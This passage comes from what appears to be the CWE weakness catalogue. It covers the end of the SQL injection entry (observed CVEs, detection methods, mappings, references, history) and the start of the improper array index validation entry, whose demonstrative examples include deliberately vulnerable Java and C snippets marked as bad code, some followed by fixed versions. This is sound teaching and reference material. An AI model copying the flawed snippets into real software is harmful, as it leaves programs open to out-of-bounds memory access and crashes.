While the programmer applies an allowlist to the user input, it has shortcomings. First of all, the user is still allowed to provide hyphens, which are used as comment structures in SQL. If a user specifies "--" then the remainder of the statement will be treated as a comment, which may bypass security logic. Furthermore, the allowlist permits the apostrophe, which is also a data / command separator in SQL. If a user supplies a name with an apostrophe, they may be able to alter the structure of the whole statement and even change control flow of the program, possibly accessing or modifying confidential information. In this situation, both the hyphen and apostrophe are legitimate characters for a last name and permitting them is required. Instead, a programmer may want to use a prepared statement or apply an encoding routine to the input to prevent any data / directive misinterpretations.

Selected Observed Examples

Reference	Description
CVE-2024-6847	SQL injection in AI chatbot via a conversation message
CVE-2025-26794	SQL injection in e-mail agent through SQLite integration
CVE-2023-32530	SQL injection in security product dashboard using crafted certificate fields
CVE-2021-42258	SQL injection in time and billing software, as exploited in the wild per CISA KEV.
CVE-2021-27101	SQL injection in file-transfer system via a crafted Host header, as exploited in the wild per CISA KEV.
CVE-2020-12271	SQL injection in firewall product's admin interface or user portal, as exploited in the wild per CISA KEV.
CVE-2019-3792	An automation system written in Go contains an API that is vulnerable to SQL injection allowing the attacker to read privileged data.
CVE-2004-0366	chain: SQL injection in library intended for database authentication allows SQL injection and authentication bypass.
CVE-2008-2790	SQL injection through an ID that was supposed to be numeric.
CVE-2008-2223	SQL injection through an ID that was supposed to be numeric.
CVE-2007-6602	SQL injection via user name.
CVE-2008-5817	SQL injection via user name or password fields.
CVE-2003-0377	SQL injection in security product, using a crafted group name.
CVE-2008-2380	SQL injection in authentication library.
CVE-2017-11508	SQL injection in vulnerability management and reporting tool, using a crafted password.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)
Resultant	(where the weakness is typically related to the presence of some other weaknesses)

Detection Methods

Method	Details
Automated Static Analysis	This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes. Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis. Note:This is not a perfect solution, since 100% accuracy and coverage are not feasible.
Automated Dynamic Analysis	This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. Effectiveness: Moderate
Manual Analysis	Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.
Automated Static Analysis - Binary or Bytecode	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Bytecode Weakness Analysis - including disassembler + source code weakness analysis Binary Weakness Analysis - including disassembler + source code weakness analysis Effectiveness: High
Dynamic Analysis with Automated Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Database Scanners Cost effective for partial coverage: Web Application Scanner Web Services Scanner Effectiveness: High
Dynamic Analysis with Manual Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Fuzz Tester Framework-based Fuzzer Effectiveness: SOAR Partial
Manual Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Manual Source Code Review (not inspections) Cost effective for partial coverage: Focused Manual Spotcheck - Focused manual analysis of source Effectiveness: High
Automated Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Source code Weakness Analyzer Context-configured Source Code Weakness Analyzer Effectiveness: High
Architecture or Design Review	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Formal Methods / Correct-By-Construction Cost effective for partial coverage: Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	635	Weaknesses Originally Used by NVD from 2008 to 2016
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	713	OWASP Top Ten 2007 Category A2 - Injection Flaws
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	722	OWASP Top Ten 2004 Category A1 - Unvalidated Input
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	727	OWASP Top Ten 2004 Category A6 - Injection Flaws
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	751	2009 Top 25 - Insecure Interaction Between Components
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	801	2010 Top 25 - Insecure Interaction Between Components
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	810	OWASP Top Ten 2010 Category A1 - Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	864	2011 Top 25 - Insecure Interaction Between Components
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	929	OWASP Top Ten 2013 Category A1 - Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	990	SFP Secondary Cluster: Tainted Input to Command
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1005	7PK - Input Validation and Representation
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1027	OWASP Top Ten 2017 Category A1 - Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1200	Weaknesses in the 2019 CWE Top 25 Most Dangerous Software Errors
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1337	Weaknesses in the 2021 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1340	CISQ Data Protection Measures
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1347	OWASP Top Ten 2021 Category A03:2021 - Injection
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1350	Weaknesses in the 2020 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1387	Weaknesses in the 2022 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1409	Comprehensive Categorization: Injection
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1425	Weaknesses in the 2023 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1430	Weaknesses in the 2024 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1435	Weaknesses in the 2025 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1440	OWASP Top Ten 2025 Category A05:2025 - Injection

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Notes

Relationship

SQL injection can be resultant from special character mismanagement, MAID, or denylist/allowlist problems. It can be primary to authentication errors.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
PLOVER			SQL injection
7 Pernicious Kingdoms			SQL Injection
CLASP			SQL injection
OWASP Top Ten 2007	A2	CWE More Specific	Injection Flaws
OWASP Top Ten 2004	A1	CWE More Specific	Unvalidated Input
OWASP Top Ten 2004	A6	CWE More Specific	Injection Flaws
WASC	19		SQL Injection
Software Fault Patterns	SFP24		Tainted input to command
OMG ASCSM	ASCSM-CWE-89
SEI CERT Oracle Coding Standard for Java	IDS00-J	Exact	Prevent SQL injection

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-108	Command Line Execution through SQL Injection
CAPEC-109	Object Relational Mapping Injection
CAPEC-110	SQL Injection through SOAP Parameter Tampering
CAPEC-470	Expanding Control over the Operating System from the Database
CAPEC-66	SQL Injection
CAPEC-7	Blind SQL Injection

References

[REF-1460]	rain.forest.puppy. "NT Web Technology Vulnerabilities". Phrack Issue 54, Volume 8. 1998-12-25. <https://phrack.org/issues/54/8>. (URL validated: 2025-07-24)
[REF-44]	Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 1: SQL Injection." Page 3. McGraw-Hill. 2010.
[REF-7]	Michael Howard and David LeBlanc. "Writing Secure Code". Chapter 12, "Database Input Issues" Page 397. 2nd Edition. Microsoft Press. 2002-12-04. <https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223>.
[REF-867]	OWASP. "SQL Injection Prevention Cheat Sheet". <https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html>. (URL validated: 2025-08-04)
[REF-868]	Steven Friedl. "SQL Injection Attacks by Example". 2007-10-10. <http://www.unixwiz.net/techtips/sql-injection.html>.
[REF-869]	Ferruh Mavituna. "SQL Injection Cheat Sheet". 2007-03-15. <https://web.archive.org/web/20080126180244/http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/>. (URL validated: 2023-04-07)
[REF-870]	David Litchfield, Chris Anley, John Heasman and Bill Grindlay. "The Database Hacker's Handbook: Defending Database Servers". Wiley. 2005-07-14.
[REF-871]	David Litchfield. "The Oracle Hacker's Handbook: Hacking and Defending Oracle". Wiley. 2007-01-30.
[REF-872]	Microsoft. "SQL Injection". 2008-12. <https://learn.microsoft.com/en-us/previous-versions/sql/sql-server-2008-r2/ms161953(v=sql.105)?redirectedfrom=MSDN>. (URL validated: 2023-04-07)
[REF-873]	Microsoft Security Vulnerability Research & Defense. "SQL Injection Attack". <https://msrc.microsoft.com/blog/2008/05/sql-injection-attack/>. (URL validated: 2023-04-07)
[REF-874]	Michael Howard. "Giving SQL Injection the Respect it Deserves". 2008-05-15. <https://learn.microsoft.com/en-us/archive/blogs/michael_howard/giving-sql-injection-the-respect-it-deserves>. (URL validated: 2023-04-07)
[REF-875]	Frank Kim. "Top 25 Series - Rank 2 - SQL Injection". SANS Software Security Institute. 2010-03-01. <https://www.sans.org/blog/top-25-series-rank-2-sql-injection/>. (URL validated: 2023-04-07)
[REF-76]	Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege>. (URL validated: 2023-04-07)
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "SQL Queries", Page 431. 1st Edition. Addison Wesley. 2006.
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 17, "SQL Injection", Page 1061. 1st Edition. Addison Wesley. 2006.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-89. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.
[REF-1447]	Cybersecurity and Infrastructure Security Agency. "Secure by Design Alert: Eliminating SQL Injection Vulnerabilities in Software". 2024-03-25. <https://www.cisa.gov/resources-tools/resources/secure-design-alert-eliminating-sql-injection-vulnerabilities-software>. (URL validated: 2024-07-14)
[REF-1479]	Gregory Larsen, E. Kenneth Hong Fong, David A. Wheeler and Rama S. Moorthy. "State-of-the-Art Resources (SOAR) for Software Vulnerability Detection, Test, and Evaluation". 2014-07. <https://www.ida.org/-/media/feature/publications/s/st/stateoftheart-resources-soar-for-software-vulnerability-detection-test-and-evaluation/p-5061.ashx>. (URL validated: 2025-09-05)
[REF-1481]	D3FEND. "D3FEND: Application Layer Firewall". <https://d3fend.mitre.org/dao/artifact/d3f:ApplicationLayerFirewall/>. (URL validated: 2025-09-06)
[REF-1482]	D3FEND. "D3FEND: D3-TL Trusted Library". <https://d3fend.mitre.org/technique/d3f:TrustedLibrary/>. (URL validated: 2025-09-06)

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	PLOVER
2006-07-19 (CWE Draft 3, 2006-07-19)
Contributions
Contribution Date	Contributor	Organization
2024-02-29 (CWE 4.15, 2024-07-16)	Abhi Balakrishnan
2024-02-29 (CWE 4.15, 2024-07-16)	Provided diagram to improve CWE usability
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Observed_Examples, Relationships, Weakness_Ordinalities
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Detection_Factors, Potential_Mitigations, References
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Applicable_Platforms, Demonstrative_Examples, References
2024-11-19 (CWE 4.16, 2024-11-19)	CWE Content Team	MITRE
2024-11-19 (CWE 4.16, 2024-11-19)	updated Relationships
2024-07-16 (CWE 4.15, 2024-07-16)	CWE Content Team	MITRE
2024-07-16 (CWE 4.15, 2024-07-16)	updated Alternate_Terms, Common_Consequences, Description, Diagram, References
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Demonstrative_Examples, Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes, Relationships
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated References, Relationships, Time_of_Introduction
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Demonstrative_Examples, Description
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated Observed_Examples, References
2022-06-28	CWE Content Team	MITRE
2022-06-28	updated Observed_Examples, Relationships
2021-10-28	CWE Content Team	MITRE
2021-10-28	updated Relationships
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Potential_Mitigations, Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Demonstrative_Examples, Potential_Mitigations, Relationship_Notes
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Potential_Mitigations, Relationships, Time_of_Introduction
2019-09-19	CWE Content Team	MITRE
2019-09-19	updated Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2018-03-27	CWE Content Team	MITRE
2018-03-27	updated References, Relationships
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, Observed_Examples, References, Relationships, White_Box_Definitions
2017-05-03	CWE Content Team	MITRE
2017-05-03	updated Relationships
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Detection_Factors, Relationships, Taxonomy_Mappings
2014-06-23	CWE Content Team	MITRE
2014-06-23	updated Relationships
2013-07-17	CWE Content Team	MITRE
2013-07-17	updated Relationships
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Potential_Mitigations, References
2011-06-27	CWE Content Team	MITRE
2011-06-27	updated Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Demonstrative_Examples
2010-09-27	CWE Content Team	MITRE
2010-09-27	updated Potential_Mitigations
2010-06-21	CWE Content Team	MITRE
2010-06-21	updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, References, Relationships
2010-04-05	CWE Content Team	MITRE
2010-04-05	updated Demonstrative_Examples, Potential_Mitigations
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2009-12-28	CWE Content Team	MITRE
2009-12-28	updated Potential_Mitigations
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated Description, Name, White_Box_Definitions
2009-07-17	KDM Analytics
2009-07-17	Improved the White_Box_Definition
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Demonstrative_Examples, Name, Related_Attack_Patterns
2009-03-10	CWE Content Team	MITRE
2009-03-10	updated Potential_Mitigations
2009-01-12	CWE Content Team	MITRE
2009-01-12	updated Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Observed_Examples
2008-10-14	CWE Content Team	MITRE
2008-10-14	updated Description
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Applicable_Platforms, Common_Consequences, Modes_of_Introduction, Name, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings
2008-08-15 (CWE 1.0, 2008-09-09)		Veracode
2008-08-15 (CWE 1.0, 2008-09-09)	Suggested OWASP Top Ten 2004 mapping
2008-08-01 (CWE 1.0, 2008-09-09)		KDM Analytics
2008-08-01 (CWE 1.0, 2008-09-09)	added/updated white box definitions
2008-07-01 (CWE 1.0, 2008-09-09)	Eric Dalci	Cigital
2008-07-01 (CWE 1.0, 2008-09-09)	updated Time_of_Introduction
Previous Entry Names
Change Date	Previous Entry Name
2008-04-11	SQL Injection
2008-09-09	Failure to Sanitize Data into SQL Queries (aka 'SQL Injection')
2009-01-12	Failure to Sanitize Data within SQL Queries (aka 'SQL Injection')
2009-05-27	Failure to Preserve SQL Query Structure (aka 'SQL Injection')
2009-07-27	Failure to Preserve SQL Query Structure ('SQL Injection')
2010-06-21	Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')

Weakness ID: 129

Vulnerability Mapping: ALLOWED This CWE ID may be used to map to real-world vulnerabilities
Abstraction: Variant Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.

View customized information:

Description

Alternate Terms

out-of-bounds array index
index-out-of-range
array index underflow

Common Consequences

Impact	Details
DoS: Crash, Exit, or Restart	Scope: Integrity, Availability Use of an index that is outside the bounds of an array will very likely result in the corruption of relevant memory and perhaps instructions, leading to a crash, if the values are outside of the valid memory area.
Modify Memory	Scope: Integrity If the memory corrupted is data, rather than instructions, the system will continue to function with improper values.
Modify Memory; Read Memory	Scope: Confidentiality, Integrity Use of an index that is outside the bounds of an array can also trigger out-of-bounds read or write operations, or operations on the wrong objects; i.e., "buffer overflows" are not always the result. This may result in the exposure or modification of sensitive data.
Execute Unauthorized Code or Commands	Scope: Integrity, Confidentiality, Availability If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow and possibly without the use of large inputs if a precise index can be controlled.
DoS: Crash, Exit, or Restart; Execute Unauthorized Code or Commands; Read Memory; Modify Memory	Scope: Integrity, Availability, Confidentiality A single fault could allow either an overflow (CWE-788) or underflow (CWE-786) of the array index. What happens next will depend on the type of operation being performed out of bounds, but can expose sensitive information, cause a system crash, or possibly lead to arbitrary code execution.

Potential Mitigations

Phase(s)	Mitigation
Architecture and Design	Strategy: Input Validation Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173).
Architecture and Design	For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings.
Requirements	Strategy: Language Selection Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. For example, Ada allows the programmer to constrain the values of a variable and languages such as Java and Ruby will allow the programmer to handle exceptions when an out-of-bounds index is accessed.
Operation; Build and Compilation	Strategy: Environment Hardening Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. Effectiveness: Defense in Depth Note: These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333].
Operation	Strategy: Environment Hardening Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. Effectiveness: Defense in Depth Note: This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.
Implementation	Strategy: Input Validation Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When accessing a user-controlled array index, use a stringent range of values that are within the target array. Make sure that you do not allow negative values to be used. That is, verify the minimum as well as the maximum of the range of acceptable values.
Implementation	Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow.
Architecture and Design; Operation	Strategy: Environment Hardening Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Architecture and Design; Operation	Strategy: Sandbox or Jail Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails. Effectiveness: Limited Note: The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1285	Improper Validation of Specified Index, Position, or Offset in Input
CanPrecede	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	119	Improper Restriction of Operations within the Bounds of a Memory Buffer
CanPrecede	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	789	Memory Allocation with Excessive Size Value
CanPrecede	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	823	Use of Out-of-range Pointer Offset

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	20	Improper Input Validation

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages

C (Often Prevalent)

C++ (Often Prevalent)

Class: Not Language-Specific (Undetermined Prevalence)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

In the code snippet below, an untrusted integer value is used to reference an object in an array.

(bad code)

Example Language: Java

public String getValue(int index) {

return array[index];

}

If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised.

Example 2

The following example takes a user-supplied value to allocate an array of objects and then operates on the array.

(bad code)

Example Language: Java

private void buildList ( int untrustedListSize ){

if ( 0 > untrustedListSize ){

die("Negative value supplied for list size, die evil hacker!");

}
Widget[] list = new Widget [ untrustedListSize ];
list[0] = new Widget();

}

This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown.

Example 3

In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method

(bad code)

Example Language: C

int getValueFromArray(int *array, int len, int index) {

int value;

// check that the array index is less than the maximum

// length of the array
if (index < len) {

// get the value at the specified index of the array
value = array[index];

}
// if array index is invalid then output error message

// and return value indicating error
else {

printf("Value is: %d\n", array[index]);
value = -1;

}

return value;

}

However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in reading data before the beginning of the buffer (CWE-127) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below.

(good code)

Example Language: C

...

// check that the array index is within the correct

// range of values for the array
if (index >= 0 && index < len) {

...

Example 4

The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index.

(bad code)

Example Language: C

/* capture the sizes of all messages */
int getsizes(int sock, int count, int *sizes) {

...
char buf[BUFFER_SIZE];
int ok;
int num, size;

// read values from socket and added to sizes array
while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
{

// continue read from socket until buf only contains '.'
if (DOTLINE(buf))

break;

else if (sscanf(buf, "%d %d", &num, &size) == 2)

sizes[num - 1] = size;

}

...

}

In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.

(good code)

Example Language: C

/* capture the sizes of all messages */
int getsizes(int sock, int count, int *sizes) {

...
char buf[BUFFER_SIZE];
int ok;
int num, size;

// read values from socket and added to sizes array
while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
{

// continue read from socket until buf only contains '.'
if (DOTLINE(buf))

break;

else if (sscanf(buf, "%d %d", &num, &size) == 2) {

if (num > 0 && num <= (unsigned)count)

sizes[num - 1] = size;

else

/* warn about possible attempt to induce buffer overflow */
report(stderr, "Warning: ignoring bogus data for message sizes returned by server.\n");

}

...

}

Example 5

In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index.

(bad code)

Example Language: Java

// Method called from servlet to obtain product information
public String displayProductSummary(int index) {

String productSummary = new String("");

try {

String productSummary = getProductSummary(index);

} catch (Exception ex) {...}

return productSummary;

}

public String getProductSummary(int index) {

return products[index];

}

